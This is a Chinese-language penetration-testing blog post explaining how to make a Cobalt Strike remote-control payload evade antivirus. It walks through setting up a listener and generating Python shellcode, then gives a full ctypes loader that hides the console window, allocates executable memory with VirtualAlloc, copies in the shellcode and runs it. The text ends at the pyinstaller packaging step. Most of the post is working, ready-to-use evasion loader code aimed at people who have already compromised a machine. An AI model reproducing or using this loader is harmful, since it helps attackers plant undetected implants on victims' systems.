您现在的位置是：网站首页> 网络安全渗透测试

2019年Cobalt Strike远控利用pyinstaller打包shellcode实现免杀

栗子2019-07-20 14:32:46【渗透测试】人已围观

简介平常师傅们getshell后，进一步利用时经常碰到杀软，奈何免杀又是一门新技术，成了拦路虎。给师傅们献上前几天刚刚测试过的免杀方法，门槛低却很有效，大家谨慎使用～

设置监听

现在CS上设置监听端口及利用的payload、设置监听ip、端口，名字随便起

生成shellcode

Attacks->Packages->payload generator

生成python shellcode文件，默认32位，目标机64位选择64即可。

免杀

将生成的shellcode中的buf变量，复制到下面代码中，替换“xxx”

from ctypes import *
import ctypes
# length: 891 bytes
buf = "xxx"
#libc = CDLL('libc.so.6')
PROT_READ = 1
PROT_WRITE = 2
PROT_EXEC = 4
def executable_code(buffer):
   buf = c_char_p(buffer)
   size = len(buffer)
   addr = libc.valloc(size)
   addr = c_void_p(addr)
   if 0 == addr: 
       raise Exception("Failed to allocate memory")
   memmove(addr, buf, size)
   if 0 != libc.mprotect(addr, len(buffer), PROT_READ | PROT_WRITE | PROT_EXEC):
       raise Exception("Failed to set protection on buffer")
   return addr
VirtualAlloc = ctypes.windll.kernel32.VirtualAlloc
VirtualProtect = ctypes.windll.kernel32.VirtualProtect
shellcode = bytearray(buf)
whnd = ctypes.windll.kernel32.GetConsoleWindow()   
if whnd != 0:
      if 666==666:
             ctypes.windll.user32.ShowWindow(whnd, 0)   
             ctypes.windll.kernel32.CloseHandle(whnd)
print ".................................."*666
memorywithshell = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),
                                       ctypes.c_int(len(shellcode)),
                                         ctypes.c_int(0x3000),
                                         ctypes.c_int(0x40))
buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
old = ctypes.c_long(1)
VirtualProtect(memorywithshell, ctypes.c_int(len(shellcode)),0x40,ctypes.byref(old))
ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(memorywithshell),
                                    buf,
                                    ctypes.c_int(len(shellcode)))
shell = cast(memorywithshell, CFUNCTYPE(c_void_p))
shell()

使用pyinstaller进行打包